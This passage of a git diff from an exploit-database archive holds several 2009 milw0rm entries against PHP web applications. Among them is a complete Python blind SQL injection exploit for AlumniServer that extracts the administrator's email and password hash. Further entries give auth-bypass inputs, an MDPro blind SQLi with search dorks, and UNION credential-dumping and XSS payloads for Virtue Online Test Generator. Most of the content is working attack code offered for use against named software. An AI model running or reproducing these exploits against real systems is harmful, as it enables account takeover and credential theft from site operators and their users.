+~~~> E-Mail=y3nh4ck3r@gmail.com') OR gn='AdminGn' /*
+~~~> Password=nothing
+
+
+[!!!] Case-3: If admin is a hidden user...
+
+
+~~~> E-Mail=y3nh4ck3r@gmail.com') OR hideuser='y' /*
+~~~> Password=nothing
+
+
+
+
+<<<-----------------------------EOF---------------------------------->>>ENJOY IT!
+
+
+
+
+##############################################################################
+##############################################################################
+##**************************************************************************##
+##  SPECIAL THANKS TO: Str0ke and every H4ck3r(all who do milw0rm)!         ##
+##**************************************************************************##
+##--------------------------------------------------------------------------##
+##**************************************************************************##
+## GREETZ TO: JosS, Ulises2k, J.McCray, Evil1 and Spanish Hack3Rs community!##
+##**************************************************************************##
+##############################################################################
+##############################################################################
+
+# milw0rm.com [2009-06-25]
diff --git a/platforms/php/webapps/9020.py b/platforms/php/webapps/9020.py
index bb7a33a6f..24d737106 100755
--- a/platforms/php/webapps/9020.py
+++ b/platforms/php/webapps/9020.py
@@ -1,287 +1,287 @@
-#!/usr/bin/python
-#***********************************************************************************************
-#***********************************************************************************************
-#**	       										      **
-#**  											      **
-#**     [] [] []  [][][][>  []     []  [][  ][]     []   [][]]  []  [>  [][][][>  [][][][]    **
-#**     || || ||  []        [][]   []   []  []     []   []      [] []   []	  []    []    **
-#   [>  [][][][]  [][][][>  [] []  []   []  []   [][]  []       [][]    [][][][>  []    []    **
-#**  [-----[]-----[][][][>--[]--[]-[]---[][][]--[]-[]--[]--------[]-----[][][][>--[][][][]---\ 
-#**==[>    []     []        []   [][]   []  [] [][][]  []       [][]    []           [] []  >>--
-#**  [----[[]]----[]--- ----[]-----[]---[]--[]-----[]--[]-------[] []---[]----------[]--[]---/ 
-#   [>   [[[]]]   [][][][>  [][]   [] [][[] [[]]  [][]  [][][]  []  [>  [][][][> <][]   []    
-#**							                                      **
-#**    											      **
-#**                           VIVA SPAIN!... GANAREMOS EL MUNDIAL!...o.O                      **
-#**					   PROUD TO BE SPANISH!	                              **
-#**											      **
-#***********************************************************************************************
-#***********************************************************************************************
-#
-#---------------------------------------------------------------------------------------------
-#|       	       (POST var 'resetpwemail') BLIND SQL INJECTION EXPLOIT      	     |
-#|-------------------------------------------------------------------------------------------|
-#|                                    |    AlumniServer v-1.0.1      |		    	     |
-#|  CMS INFORMATION:          	       ------------------------------	               	     |
-#|										             |
-#|-->WEB: http://www.alumniserver.net/			          	                     |
-#|-->DOWNLOAD: http://www.alumniserver.net/		         	                     |
-#|-->DEMO: N/A   	     			    					     |
-#|-->CATEGORY: CMS/Education								     |
-#|-->DESCRIPTION: Open Source Alumni software, based on PHP+MySQL for universities, schools  |
-#|		and companies. Services for usersinclude profile page,...	     	     |
-#|-->RELEASED: 2009-06-11								     |
-#|											     |
-#|  CMS VULNERABILITY:									     |
-#|											     |
-#|-->TESTED ON: Python 2.6								     |
-#|-->DORK: "AlumniServer project"					                     |
-#|-->CATEGORY: BSQLi PYTHON EXPLOIT		                             		     |
-#|-->AFFECT VERSION: CURRENT				 			             |
-#|-->Discovered Bug date: 2009-06-15							     |
-#|-->Reported Bug date: 2009-06-15							     |
-#|-->Fixed bug date: N/A							             |
-#|-->Info patch (????): N/A					  			     |
-#|-->Author: YEnH4ckEr									     |
-#|-->mail: y3nh4ck3r[at]gmail[dot]com							     |
-#|-->WEB/BLOG: N/A									     |
-#|-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo.      |
-#|-->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!)		     |
-#---------------------------------------------------------------------------------------------
-#
-#------------
-#CONDITIONS:
-#------------
-#
-#magic quotes=OFF
-#
-#-------
-#NEED:
-#-------
-#
-#Valid email
-#
-#---------------------------------------
-#PROOF OF CONCEPT (SQL INJECTION):
-#---------------------------------------
-#
-#POST http://[HOST]/[PATH]/Password.php HTTP/1.1
-#Host: [HOST]
-#Referer: http://[HOST]/[PATH]/Password.php
-#Content-Type: application/x-www-form-urlencoded
-#
-#resetpwemail=[valid_mail]%27+and+1%3D%270 --> FALSE
-#resetpwemail=[valid_mail]%27+and+1%3D%271 --> TRUE
-#
-#Other P0C (with a registered user):
-#
-#http://[HOST]/[PATH]/Profile.php?id=[valid_id]%27+AND+1=0%23 -->FALSE
-#http://[HOST]/[PATH]/Profile.php?id=[valid_id]%27+AND+1=1%23 -->TRUE
-#
-#--------------
-#WATCH VIDEOS
-#--------------
-#
-# BSQLi --> http://www.youtube.com/watch?v=K3z7iyHttBw
-#
-# AUTH BYPASS --> http://www.youtube.com/watch?v=UjDm2p7qHj0
-#
-#
-##############################################################################
-##############################################################################
-##**************************************************************************##
-##  SPECIAL THANKS TO: Str0ke and every H4ck3r(all who do milw0rm)!         ##
-##**************************************************************************##
-##--------------------------------------------------------------------------##
-##**************************************************************************##
-## GREETZ TO: JosS, Ulises2k, J.McCray, Evil1 and Spanish Hack3Rs community!##
-##**************************************************************************##
-##############################################################################
-##############################################################################
-#
-#Used modules
-import urllib2,sys,re,os
-#Defined functions
-def init():
-	if(sys.platform=='win32'):
-		os.system("cls")
-		os.system ("title AlumniServer v-1.0.1 Blind SQL Injection Exploit")
-		os.system ("color 02")
-	else:
-		os.system("clear")
-
-	print "\t#######################################################\n\n"
-	print "\t#######################################################\n\n"
-	print "\t##     AlumniServer v-1.0.1 Blind SQLi Exploit       ##\n\n"
-	print "\t##       ++Conditions: magic_quotes=OFF              ##\n\n"
-	print "\t##       ++Needed: Valid mail                        ##\n\n"
-	print "\t##               Author: Y3nh4ck3r                   ##\n\n"
-	print "\t##      Contact:y3nh4ck3r[at]gmail[dot]com           ##\n\n"
-	print "\t##            Proud to be Spanish!                   ##\n\n"
-	print "\t#######################################################\n\n"
-	print "\t#######################################################\n\n"
-	
-def request(urltarget,postmsg):
-	req=urllib2.Request(url=urltarget,data=postmsg)
-	conn = urllib2.urlopen(req)
-	outcode=conn.read()
-	#print outcode #--> Active this line for debugger mode
-	return outcode
-
-def error():
-	print "\t------------------------------------------------------------\n"
-	print "\tWeb isn't vulnerable!\n\n"
-	print "\t--->Maybe:\n\n"
-	print "\t\t1.-Patched.\n"
-	print "\t\t2.-Bad path or host.\n"
-	print "\t\t3.-Bad mail.\n"
-	print "\t\t4.-Magic quotes ON.\n"
-	print "\t\tEXPLOIT FAILED!\n"
-	print "\t------------------------------------------------------------\n"
-	sys.exit()
-
-def testedblindsql():
-	print "\t-----------------------------------------------------------------\n"
-	print "\tWEB MAYBE BE VULNERABLE!\n\n"
-	print "\tTested Blind SQL Injection.\n"		
-	print "\tStarting exploit...\n"
-	print "\t-----------------------------------------------------------------\n\n"
-
-def helper(filename):
-	print "\n\t[!!!] AlumniServer v-1.0.1 Blind SQL Injection Exploit\n"
-	print "\t[!!!] USAGE MODE: [!!!]\n"
-	print "\t[!!!] python "+filename+" [HOST] [PATH] [MAIL] [ID_ADMIN/HIDDEN/BRUTEFORCEID]\n"
-	print "\t[!!!] [HOST]: Web.\n"
-	print "\t[!!!] [PATH]: Home Path.\n"
-	print "\t[!!!] [MAIL]: Mail for fish\n"
-	print "\t[!!!] [ID_ADMIN/HIDDEN/BRUTEFORCEID]: Id_admin if we are registered users or 'hidden' value if admin is hidden.\n"
-	print "\t[!!!]  Also can use 'bruteforceid' value for bruteforce admin id previously.\n"
-	print "\t[!!!] Example: python "+filename+" www.example.com demo y3nh4ck3r@gmail.com cd54cd7df99a\n"
-	print "\t[!!!] Example: python "+filename+" www.example.com demo y3nh4ck3r@gmail.com hidden\n"
-	print "\t[!!!] Example: python "+filename+" www.example.com demo y3nh4ck3r@gmail.com bruteforceid\n"
-	sys.exit()
-	
-def brute_length(urlrequest, idadmin, mail):
-	#Username length
-	flag=1
-	i=0
-	while(flag==1):
-		i=i+1
-		if(idadmin=="hidden"):
-			blindsql="resetpwemail="+mail+"'+AND+(SELECT+length(email)+FROM+as_users+WHERE+hideuser='y')='"+str(i) #injected code
-		else:
-			blindsql="resetpwemail="+mail+"'+AND+(SELECT+length(email)+FROM+as_users+WHERE+id='"+idadmin+"')='"+str(i) #injected code
-		output=request(urlrequest, blindsql)
-		if(re.search("You will receive an email shortly with a link that enables you to reset your password.",output)):
-			flag=2
-		else:
-			flag=1
-		#This is the max length of email
-		if (i>50):
-			error()
-		#Save column length
-	length=i
-	print "\t<<<<<--------------------------------------------------------->>>>>\n"
-	print "\tLength catched!\n"
-	print "\tLength E-mail --> "+str(length)+"\n"
-	print "\tWait several minutes...\n"
-	print "\t<<<<<--------------------------------------------------------->>>>>\n\n"
-	return length
-def exploiting (lengthvalue, urlrequest, column, idadmin, mail):
-	#Bruteforcing values
-	values=""
-	k=1
-	z=32
-	while((k<=lengthvalue) and (z<=126)):
-		#Choose method, hidden or with id
-		if(idadmin=="hidden"):
-			blindsql="resetpwemail="+mail+"'+AND+ascii(substring((SELECT+"+column+"+FROM+as_users+WHERE+hideuser='y'),"+str(k)+",1))='"+str(z) #injected code
-		else:
-			blindsql="resetpwemail="+mail+"'+AND+ascii(substring((SELECT+"+column+"+FROM+as_users+WHERE+id='"+idadmin+"'),"+str(k)+",1))='"+str(z) #injected code
-		output=request(urlrequest, blindsql)
-		if(re.search("You will receive an email shortly with a link that enables you to reset your password.",output)):
-			values=values+chr(z)
-			k=k+1
-			z=32
-#new char
-		z=z+1 
-	return values
-	
-def exploiting_id (urlrequest, mail):
-	#Bruteforcing values
-	values=""
-	#Possible values of id
-	arrayids=[0,1,2,3,4,5,6,7,8,9,'a','b','c','d','e','f']
-	k=1
-	#Max length of id = 12
-	while(k<=12):
-		for z in arrayids:	
-			blindsql="resetpwemail="+mail+"'+AND+substring((SELECT+id+FROM+as_users+HAVING+MIN(membersince)),"+str(k)+",1)='"+str(z) #injected code
-			output=request(urlrequest, blindsql)
-			if(re.search("You will receive an email shortly with a link that enables you to reset your password.",output)):
-				values=values+str(z)
-				k=k+1
-				z='g'		
-	return values
-#Main
-init()
-#Init variables
-if(len(sys.argv) <= 4):
-    helper(sys.argv[0])
-
-host=sys.argv[1]
-path=sys.argv[2]
-mail=sys.argv[3]
-#Define mode: ID, hidden or bruteforceid
-if(sys.argv[4]=="hidden"):
-	mode="hidden"
-elif(sys.argv[4]=="bruteforceid"):
-	mode="bruteforceid"
-else:
-	mode="usual"
-	idadmin=sys.argv[4]
-
-finalrequest="http://"+host+"/"+path+"/Password.php"
-testblind1="resetpwemail="+mail+"%27+and+1%3D%271" #Return true
-outcode1=request(finalrequest,testblind1)
-testblind2="resetpwemail="+mail+"%27+and+1%3D%270" #Return false
-outcode2=request(finalrequest,testblind2)
-#Check BSQLi
-if(outcode1==outcode2):
-	error()
-else:
-	testedblindsql()
-if(mode=="usual"):
-	#Catching length of admin email
-	lengthadmin=brute_length(finalrequest, idadmin, mail)
-	mailadmin=exploiting(lengthadmin, finalrequest, "email", idadmin, mail)
-	#Catching value of password (hashed md5)
-	passwordhash=exploiting(32, finalrequest, "password", idadmin, mail)
-elif(mode=="hidden"):
-	#Catching length of admin email
-	lengthadmin=brute_length(finalrequest, "hidden", mail)
-	mailadmin=exploiting(lengthadmin, finalrequest, "email", "hidden", mail)
-	#Catching value of password (hashed md5)
-	passwordhash=exploiting(32, finalrequest, "password", "hidden", mail)
-else:
-	print "\t<<<<<--------------------------------------------------------->>>>>\n"
-	print "\tBruteforcing id. Wait a few minutes...\n"
-	print "\t<<<<<--------------------------------------------------------->>>>>\n\n"
-	#Catching value of admin id
-	idadmin=exploiting_id(finalrequest, mail)
-
-print "\n\t\t*************************************************\n"
-print "\t\t*********  EXPLOIT EXECUTED SUCCESSFULLY ********\n"
-print "\t\t*************************************************\n\n"
-#Mode usual and hidden
-if((mode=="usual") or (mode=="hidden")):
-	print "\t\tAdmin-mail: "+mailadmin+"\n\n"
-	print "\t\tPassword hash: "+passwordhash+"\n\n"
-else:
-#Mode bruteforceid
-    print "\t\tAdmin-id: "+idadmin+"\n\n"
-print "\n\t\t<<----------------------FINISH!-------------------->>\n\n"
-print "\t\t<<---------------Thanks to: y3nh4ck3r-------------->>\n\n"
-print "\t\t<<------------------------EOF---------------------->>\n\n"
-
-# milw0rm.com [2009-06-25]
+#!/usr/bin/python
+#***********************************************************************************************
+#***********************************************************************************************
+#**	       										      **
+#**  											      **
+#**     [] [] []  [][][][>  []     []  [][  ][]     []   [][]]  []  [>  [][][][>  [][][][]    **
+#**     || || ||  []        [][]   []   []  []     []   []      [] []   []	  []    []    **
+#   [>  [][][][]  [][][][>  [] []  []   []  []   [][]  []       [][]    [][][][>  []    []    **
+#**  [-----[]-----[][][][>--[]--[]-[]---[][][]--[]-[]--[]--------[]-----[][][][>--[][][][]---\ 
+#**==[>    []     []        []   [][]   []  [] [][][]  []       [][]    []           [] []  >>--
+#**  [----[[]]----[]--- ----[]-----[]---[]--[]-----[]--[]-------[] []---[]----------[]--[]---/ 
+#   [>   [[[]]]   [][][][>  [][]   [] [][[] [[]]  [][]  [][][]  []  [>  [][][][> <][]   []    
+#**							                                      **
+#**    											      **
+#**                           VIVA SPAIN!... GANAREMOS EL MUNDIAL!...o.O                      **
+#**					   PROUD TO BE SPANISH!	                              **
+#**											      **
+#***********************************************************************************************
+#***********************************************************************************************
+#
+#---------------------------------------------------------------------------------------------
+#|       	       (POST var 'resetpwemail') BLIND SQL INJECTION EXPLOIT      	     |
+#|-------------------------------------------------------------------------------------------|
+#|                                    |    AlumniServer v-1.0.1      |		    	     |
+#|  CMS INFORMATION:          	       ------------------------------	               	     |
+#|										             |
+#|-->WEB: http://www.alumniserver.net/			          	                     |
+#|-->DOWNLOAD: http://www.alumniserver.net/		         	                     |
+#|-->DEMO: N/A   	     			    					     |
+#|-->CATEGORY: CMS/Education								     |
+#|-->DESCRIPTION: Open Source Alumni software, based on PHP+MySQL for universities, schools  |
+#|		and companies. Services for usersinclude profile page,...	     	     |
+#|-->RELEASED: 2009-06-11								     |
+#|											     |
+#|  CMS VULNERABILITY:									     |
+#|											     |
+#|-->TESTED ON: Python 2.6								     |
+#|-->DORK: "AlumniServer project"					                     |
+#|-->CATEGORY: BSQLi PYTHON EXPLOIT		                             		     |
+#|-->AFFECT VERSION: CURRENT				 			             |
+#|-->Discovered Bug date: 2009-06-15							     |
+#|-->Reported Bug date: 2009-06-15							     |
+#|-->Fixed bug date: N/A							             |
+#|-->Info patch (????): N/A					  			     |
+#|-->Author: YEnH4ckEr									     |
+#|-->mail: y3nh4ck3r[at]gmail[dot]com							     |
+#|-->WEB/BLOG: N/A									     |
+#|-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo.      |
+#|-->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!)		     |
+#---------------------------------------------------------------------------------------------
+#
+#------------
+#CONDITIONS:
+#------------
+#
+#magic quotes=OFF
+#
+#-------
+#NEED:
+#-------
+#
+#Valid email
+#
+#---------------------------------------
+#PROOF OF CONCEPT (SQL INJECTION):
+#---------------------------------------
+#
+#POST http://[HOST]/[PATH]/Password.php HTTP/1.1
+#Host: [HOST]
+#Referer: http://[HOST]/[PATH]/Password.php
+#Content-Type: application/x-www-form-urlencoded
+#
+#resetpwemail=[valid_mail]%27+and+1%3D%270 --> FALSE
+#resetpwemail=[valid_mail]%27+and+1%3D%271 --> TRUE
+#
+#Other P0C (with a registered user):
+#
+#http://[HOST]/[PATH]/Profile.php?id=[valid_id]%27+AND+1=0%23 -->FALSE
+#http://[HOST]/[PATH]/Profile.php?id=[valid_id]%27+AND+1=1%23 -->TRUE
+#
+#--------------
+#WATCH VIDEOS
+#--------------
+#
+# BSQLi --> http://www.youtube.com/watch?v=K3z7iyHttBw
+#
+# AUTH BYPASS --> http://www.youtube.com/watch?v=UjDm2p7qHj0
+#
+#
+##############################################################################
+##############################################################################
+##**************************************************************************##
+##  SPECIAL THANKS TO: Str0ke and every H4ck3r(all who do milw0rm)!         ##
+##**************************************************************************##
+##--------------------------------------------------------------------------##
+##**************************************************************************##
+## GREETZ TO: JosS, Ulises2k, J.McCray, Evil1 and Spanish Hack3Rs community!##
+##**************************************************************************##
+##############################################################################
+##############################################################################
+#
+#Used modules
+import urllib2,sys,re,os
+#Defined functions
+def init():
+	if(sys.platform=='win32'):
+		os.system("cls")
+		os.system ("title AlumniServer v-1.0.1 Blind SQL Injection Exploit")
+		os.system ("color 02")
+	else:
+		os.system("clear")
+
+	print "\t#######################################################\n\n"
+	print "\t#######################################################\n\n"
+	print "\t##     AlumniServer v-1.0.1 Blind SQLi Exploit       ##\n\n"
+	print "\t##       ++Conditions: magic_quotes=OFF              ##\n\n"
+	print "\t##       ++Needed: Valid mail                        ##\n\n"
+	print "\t##               Author: Y3nh4ck3r                   ##\n\n"
+	print "\t##      Contact:y3nh4ck3r[at]gmail[dot]com           ##\n\n"
+	print "\t##            Proud to be Spanish!                   ##\n\n"
+	print "\t#######################################################\n\n"
+	print "\t#######################################################\n\n"
+	
+def request(urltarget,postmsg):
+	req=urllib2.Request(url=urltarget,data=postmsg)
+	conn = urllib2.urlopen(req)
+	outcode=conn.read()
+	#print outcode #--> Active this line for debugger mode
+	return outcode
+
+def error():
+	print "\t------------------------------------------------------------\n"
+	print "\tWeb isn't vulnerable!\n\n"
+	print "\t--->Maybe:\n\n"
+	print "\t\t1.-Patched.\n"
+	print "\t\t2.-Bad path or host.\n"
+	print "\t\t3.-Bad mail.\n"
+	print "\t\t4.-Magic quotes ON.\n"
+	print "\t\tEXPLOIT FAILED!\n"
+	print "\t------------------------------------------------------------\n"
+	sys.exit()
+
+def testedblindsql():
+	print "\t-----------------------------------------------------------------\n"
+	print "\tWEB MAYBE BE VULNERABLE!\n\n"
+	print "\tTested Blind SQL Injection.\n"		
+	print "\tStarting exploit...\n"
+	print "\t-----------------------------------------------------------------\n\n"
+
+def helper(filename):
+	print "\n\t[!!!] AlumniServer v-1.0.1 Blind SQL Injection Exploit\n"
+	print "\t[!!!] USAGE MODE: [!!!]\n"
+	print "\t[!!!] python "+filename+" [HOST] [PATH] [MAIL] [ID_ADMIN/HIDDEN/BRUTEFORCEID]\n"
+	print "\t[!!!] [HOST]: Web.\n"
+	print "\t[!!!] [PATH]: Home Path.\n"
+	print "\t[!!!] [MAIL]: Mail for fish\n"
+	print "\t[!!!] [ID_ADMIN/HIDDEN/BRUTEFORCEID]: Id_admin if we are registered users or 'hidden' value if admin is hidden.\n"
+	print "\t[!!!]  Also can use 'bruteforceid' value for bruteforce admin id previously.\n"
+	print "\t[!!!] Example: python "+filename+" www.example.com demo y3nh4ck3r@gmail.com cd54cd7df99a\n"
+	print "\t[!!!] Example: python "+filename+" www.example.com demo y3nh4ck3r@gmail.com hidden\n"
+	print "\t[!!!] Example: python "+filename+" www.example.com demo y3nh4ck3r@gmail.com bruteforceid\n"
+	sys.exit()
+	
+def brute_length(urlrequest, idadmin, mail):
+	#Username length
+	flag=1
+	i=0
+	while(flag==1):
+		i=i+1
+		if(idadmin=="hidden"):
+			blindsql="resetpwemail="+mail+"'+AND+(SELECT+length(email)+FROM+as_users+WHERE+hideuser='y')='"+str(i) #injected code
+		else:
+			blindsql="resetpwemail="+mail+"'+AND+(SELECT+length(email)+FROM+as_users+WHERE+id='"+idadmin+"')='"+str(i) #injected code
+		output=request(urlrequest, blindsql)
+		if(re.search("You will receive an email shortly with a link that enables you to reset your password.",output)):
+			flag=2
+		else:
+			flag=1
+		#This is the max length of email
+		if (i>50):
+			error()
+		#Save column length
+	length=i
+	print "\t<<<<<--------------------------------------------------------->>>>>\n"
+	print "\tLength catched!\n"
+	print "\tLength E-mail --> "+str(length)+"\n"
+	print "\tWait several minutes...\n"
+	print "\t<<<<<--------------------------------------------------------->>>>>\n\n"
+	return length
+def exploiting (lengthvalue, urlrequest, column, idadmin, mail):
+	#Bruteforcing values
+	values=""
+	k=1
+	z=32
+	while((k<=lengthvalue) and (z<=126)):
+		#Choose method, hidden or with id
+		if(idadmin=="hidden"):
+			blindsql="resetpwemail="+mail+"'+AND+ascii(substring((SELECT+"+column+"+FROM+as_users+WHERE+hideuser='y'),"+str(k)+",1))='"+str(z) #injected code
+		else:
+			blindsql="resetpwemail="+mail+"'+AND+ascii(substring((SELECT+"+column+"+FROM+as_users+WHERE+id='"+idadmin+"'),"+str(k)+",1))='"+str(z) #injected code
+		output=request(urlrequest, blindsql)
+		if(re.search("You will receive an email shortly with a link that enables you to reset your password.",output)):
+			values=values+chr(z)
+			k=k+1
+			z=32
+#new char
+		z=z+1 
+	return values
+	
+def exploiting_id (urlrequest, mail):
+	#Bruteforcing values
+	values=""
+	#Possible values of id
+	arrayids=[0,1,2,3,4,5,6,7,8,9,'a','b','c','d','e','f']
+	k=1
+	#Max length of id = 12
+	while(k<=12):
+		for z in arrayids:	
+			blindsql="resetpwemail="+mail+"'+AND+substring((SELECT+id+FROM+as_users+HAVING+MIN(membersince)),"+str(k)+",1)='"+str(z) #injected code
+			output=request(urlrequest, blindsql)
+			if(re.search("You will receive an email shortly with a link that enables you to reset your password.",output)):
+				values=values+str(z)
+				k=k+1
+				z='g'		
+	return values
+#Main
+init()
+#Init variables
+if(len(sys.argv) <= 4):
+    helper(sys.argv[0])
+
+host=sys.argv[1]
+path=sys.argv[2]
+mail=sys.argv[3]
+#Define mode: ID, hidden or bruteforceid
+if(sys.argv[4]=="hidden"):
+	mode="hidden"
+elif(sys.argv[4]=="bruteforceid"):
+	mode="bruteforceid"
+else:
+	mode="usual"
+	idadmin=sys.argv[4]
+
+finalrequest="http://"+host+"/"+path+"/Password.php"
+testblind1="resetpwemail="+mail+"%27+and+1%3D%271" #Return true
+outcode1=request(finalrequest,testblind1)
+testblind2="resetpwemail="+mail+"%27+and+1%3D%270" #Return false
+outcode2=request(finalrequest,testblind2)
+#Check BSQLi
+if(outcode1==outcode2):
+	error()
+else:
+	testedblindsql()
+if(mode=="usual"):
+	#Catching length of admin email
+	lengthadmin=brute_length(finalrequest, idadmin, mail)
+	mailadmin=exploiting(lengthadmin, finalrequest, "email", idadmin, mail)
+	#Catching value of password (hashed md5)
+	passwordhash=exploiting(32, finalrequest, "password", idadmin, mail)
+elif(mode=="hidden"):
+	#Catching length of admin email
+	lengthadmin=brute_length(finalrequest, "hidden", mail)
+	mailadmin=exploiting(lengthadmin, finalrequest, "email", "hidden", mail)
+	#Catching value of password (hashed md5)
+	passwordhash=exploiting(32, finalrequest, "password", "hidden", mail)
+else:
+	print "\t<<<<<--------------------------------------------------------->>>>>\n"
+	print "\tBruteforcing id. Wait a few minutes...\n"
+	print "\t<<<<<--------------------------------------------------------->>>>>\n\n"
+	#Catching value of admin id
+	idadmin=exploiting_id(finalrequest, mail)
+
+print "\n\t\t*************************************************\n"
+print "\t\t*********  EXPLOIT EXECUTED SUCCESSFULLY ********\n"
+print "\t\t*************************************************\n\n"
+#Mode usual and hidden
+if((mode=="usual") or (mode=="hidden")):
+	print "\t\tAdmin-mail: "+mailadmin+"\n\n"
+	print "\t\tPassword hash: "+passwordhash+"\n\n"
+else:
+#Mode bruteforceid
+    print "\t\tAdmin-id: "+idadmin+"\n\n"
+print "\n\t\t<<----------------------FINISH!-------------------->>\n\n"
+print "\t\t<<---------------Thanks to: y3nh4ck3r-------------->>\n\n"
+print "\t\t<<------------------------EOF---------------------->>\n\n"
+
+# milw0rm.com [2009-06-25]
diff --git a/platforms/php/webapps/9021.txt b/platforms/php/webapps/9021.txt
index 2a44a2e0c..917abadc5 100755
--- a/platforms/php/webapps/9021.txt
+++ b/platforms/php/webapps/9021.txt
@@ -1,38 +1,38 @@
-[!]Information_schema:
-
-[Product:  MDPro v 1.083.x               ]
-[site:     www.maxdev.com                ]
-[Vuln:     Blind $QL Injection (pollID)  ]
-[Author:   XaDoS ~ thanks to S3rg3770    ]
-[dork:     inurl:modules.php?op= "pollID"]
-[          "Powered By MDPro"            ]
-
-[~] Vuln:  (PollID)
-
-http://www.site.com/[MDPro_path]/modules.php?name=Surveys&op=results&pollID=[SQL]
-or
-http://www.site.com/[MDPro_path]/modules.php?op=modload&name=NS-Polls&file=index&req=results&pollID=[SQL]
-
-[~] DeMo:
-
-For example, if yuo want see the version of MySql write:
-
-http://www.site.com/[MDPro_path]/modules.php?name=Surveys&op=results&pollID=+and+substring(@@version,1,1)=5#
-
-Like:
-
-http://www.xxx.it/modules.php?op=modload&name=NS-Polls&file=index&req=results&pollID=73+and+substring(@@version,1,1)=5# [work]
-so v => 5.0.0    (this site have 96 databases) :)
-
-[~] Note:
-
-If yuo want exploit for this vuln write it by yuorself. I'm really Busy.
-
-thanks to s3rg3770 and warwolfz Crew
-
-
-\*Everything that gives pleasure has its reason. To scorn the mobs of those who go astray is not the means to bring them around*/ C.Baudelaire
-
-Have Fun :D
-
-# milw0rm.com [2009-06-25]
+[!]Information_schema:
+
+[Product:  MDPro v 1.083.x               ]
+[site:     www.maxdev.com                ]
+[Vuln:     Blind $QL Injection (pollID)  ]
+[Author:   XaDoS ~ thanks to S3rg3770    ]
+[dork:     inurl:modules.php?op= "pollID"]
+[          "Powered By MDPro"            ]
+
+[~] Vuln:  (PollID)
+
+http://www.site.com/[MDPro_path]/modules.php?name=Surveys&op=results&pollID=[SQL]
+or
+http://www.site.com/[MDPro_path]/modules.php?op=modload&name=NS-Polls&file=index&req=results&pollID=[SQL]
+
+[~] DeMo:
+
+For example, if yuo want see the version of MySql write:
+
+http://www.site.com/[MDPro_path]/modules.php?name=Surveys&op=results&pollID=+and+substring(@@version,1,1)=5#
+
+Like:
+
+http://www.xxx.it/modules.php?op=modload&name=NS-Polls&file=index&req=results&pollID=73+and+substring(@@version,1,1)=5# [work]
+so v => 5.0.0    (this site have 96 databases) :)
+
+[~] Note:
+
+If yuo want exploit for this vuln write it by yuorself. I'm really Busy.
+
+thanks to s3rg3770 and warwolfz Crew
+
+
+\*Everything that gives pleasure has its reason. To scorn the mobs of those who go astray is not the means to bring them around*/ C.Baudelaire
+
+Have Fun :D
+
+# milw0rm.com [2009-06-25]
diff --git a/platforms/php/webapps/9022.txt b/platforms/php/webapps/9022.txt
index 3e4bc9159..bfe8a53c7 100755
--- a/platforms/php/webapps/9022.txt
+++ b/platforms/php/webapps/9022.txt
@@ -1,45 +1,44 @@
-
-+===================================================================================+
-|                                                                                   |
-| Virtue Online Test Generator (AB/SQL/XSS) Multiple Remote Vulnerabilities         |
-|                                                                                   |
-+===================================================================================+
-|                                                                                   |
-| Author.: HxH                                                                      |
-| Contact: HxH[at]live[dot]at                                                       |
-|                                                                                   |
-+===================================================================================+
-|                                                                                   |
-| Script.: Virtue Online Test Generator                                             |
-| Home...: http://www.virtuenetz.com/virtue_test_generator.php                      |
-|                                                                                   |
-+-----------------------------------------------------------------------------------+
-|                                                                                   |
-| Exploit: After user login                                                         |
-|                                                                                   |
-| [+] Auth Bypass                                                                   |
-|                                                                                   |
-| http://[website]/[script]/admin/index.php                                         |
-|                                                                                   |
-| [+] SQLi                                                                          |
-|                                                                                   |
-| http://[website]/[script]/text.php?tid=[SQL]                                      |
-|                                                                                   |
-| [SQL]=null+union+select+1,2,concat(user_name,0x3a,user_pass)+from+admin--         |
-|                                                                                   |
-| [+] XSS                                                                           |
-|                                                                                   |
-| http://[website]/[script]/text.php?tid=<script>alert(1)</script>                  |
-|                                                                                   |
-+-----------------------------------------------------------------------------------+
-|                                                                                   |
-| Demo...: http://www.virtuenetz.com/exam                                           |
-| Usrinfo: E-mail:demo@virtuenetz.com ~ Pass:demo                                   |
-|                                                                                   |
-+===================================================================================+
-|                                                                                   |
-| Greetz.: ~ Jiko ~ Sniper Code ~ T3rr0rist                                         |
-|                                                                                   |
-+===================================================================================+
-
-# milw0rm.com [2009-06-26]
++===================================================================================+
+|                                                                                   |
+| Virtue Online Test Generator (AB/SQL/XSS) Multiple Remote Vulnerabilities         |
+|                                                                                   |
++===================================================================================+
+|                                                                                   |
+| Author.: HxH                                                                      |
+| Contact: HxH[at]live[dot]at                                                       |
+|                                                                                   |
++===================================================================================+
+|                                                                                   |
+| Script.: Virtue Online Test Generator                                             |
+| Home...: http://www.virtuenetz.com/virtue_test_generator.php                      |
+|                                                                                   |
++-----------------------------------------------------------------------------------+
+|                                                                                   |
+| Exploit: After user login                                                         |
+|                                                                                   |
+| [+] Auth Bypass                                                                   |
+|                                                                                   |
+| http://[website]/[script]/admin/index.php                                         |
+|                                                                                   |
+| [+] SQLi                                                                          |
+|                                                                                   |
+| http://[website]/[script]/text.php?tid=[SQL]                                      |
+|                                                                                   |
+| [SQL]=null+union+select+1,2,concat(user_name,0x3a,user_pass)+from+admin--         |
+|                                                                                   |
+| [+] XSS                                                                           |
+|                                                                                   |
+| http://[website]/[script]/text.php?tid=<script>alert(1)</script>                  |
+|                                                                                   |
++-----------------------------------------------------------------------------------+
+|                                                                                   |
+| Demo...: http://www.virtuenetz.com/exam                                           |
+| Usrinfo: E-mail:demo@virtuenetz.com ~ Pass:demo                                   |
+|                                                                                   |
++===================================================================================+
+|                                                                                   |
+| Greetz.: ~ Jiko ~ Sniper Code ~ T3rr0rist                                         |
+|                                                                                   |
++===================================================================================+
+
+# milw0rm.com [2009-06-26]
diff --git a/platforms/php/webapps/9023.txt b/platforms/php/webapps/9023.txt
index 66711cb9c..d0def7674 100755
--- a/platforms/php/webapps/9023.txt
+++ b/platforms/php/webapps/9023.txt
@@ -1,131 +1,131 @@
-***********************************************************************************************
-***********************************************************************************************
-**	       										     **
-**  											     **
-**     [] [] []  [][][][>  []     []  [][  ][]     []   [][]]  []  [>  [][][][>  [][][][]    **
-**     || || ||  []        [][]   []   []  []     []   []      [] []   []	 []    []    **
-** [>  [][][][]  [][][][>  [] []  []   []  []   [][]  []       [][]    [][][][>  []    []    **
